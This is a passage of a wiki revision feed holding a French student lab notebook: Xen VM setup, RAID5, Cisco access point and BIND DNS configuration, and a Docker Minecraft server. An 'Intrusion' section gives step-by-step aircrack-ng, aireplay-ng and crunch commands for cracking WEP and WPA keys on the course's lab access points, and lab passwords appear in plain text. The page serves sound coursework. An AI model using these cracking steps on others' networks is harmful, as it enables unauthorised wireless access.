&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60258</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60258"/>
				<updated>2022-11-28T23:24:36Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Réseau privé VLAN 20 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
=Réseau privé VLAN 20=&lt;br /&gt;
&lt;br /&gt;
Configuration Wifi EAP :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 On considère la commande ci-dessous de la configuration précédente :&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60257</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60257"/>
				<updated>2022-11-28T23:22:58Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Point d'accès wifi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
